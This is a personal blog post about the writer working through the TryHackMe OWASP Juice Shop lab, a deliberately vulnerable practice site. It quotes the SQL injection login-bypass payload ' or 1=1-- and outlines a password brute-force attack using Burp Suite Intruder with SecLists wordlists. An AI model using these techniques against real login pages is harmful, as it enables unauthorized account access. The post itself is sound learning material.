RyanPlatten.com

TryHackMe: OWASP Juice Shop

The next room in my learning path was the OWASP (Open Web Application Security Project) Juice Shop. This is a fake vulnerable website for a juice shop set up to allow you to use various exploits and attacks.

The first task has you browsing the website trying to gain knowledge from the posts that are already there, including the admin email address. It was quite easy to find this, as it was included on a review, but it did take a lot of clicking around.

The next task was using SQL injection to try and log into the site as an administrator. This room held your hand a little more than previous rooms, and laid out the steps to follow pretty easily. Capturing a fake login request using the admin email I’d found before in BurpSuite Proxy, I was able to change the password to an SQL Injection of ‘ or 1=1– which tells the computer to try the password or check if 1=1 which is obviously True, so the computer then logs in. The — at the end comments out any other SQL code which might run. Pretty cool!

After this exercise, it was time to use BurpSuite Intruder, which allows you to use a list of passwords to brute force crack a password. You can get lists in Kali using SecLists, and then load your chosen list as a payload. You can then capture a login request using Proxy, and then send it to Intruder to try the payload where you want it. BS uses this symbol § to show where quotations are implemented: in this case, the password field, to try the payload.

Running a brute force password attack on a web login with BS Intruder

One thing they don’t mention here, is how long the cracking takes using the free version. The first couple of times it didn’t seem to be able to crack the password, and it took a couple of hours to go through the list. I’m not sure if this is because I was using a virtual machine, or if my internet was slow, or it is just what happens when you are using the free version of Burp. Either way, it took a few goes before I finally managed to get the password. But it was very satisfying when I managed it!

The rest of the room was following instructions to perform various attacks or access areas of the application, based on OSINT techniques. So far so good, although I have to say that even though these rooms are classed as beginner, there is still a lot of assumed knowledge here. My skills in Javascript etc are non-existent, so I’m having to do a lot of detours in my learning to make sure that I am understanding what I’m doing. And even then… I don’t understand!

I’m hoping that as I keep going through, a lot of this will start to click. The Juice Shop is actually an open-source application, and I’m starting to wonder if I could use this with classes next year as part of a cybersecurity course. Food for thought!

ryanplatten

,

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.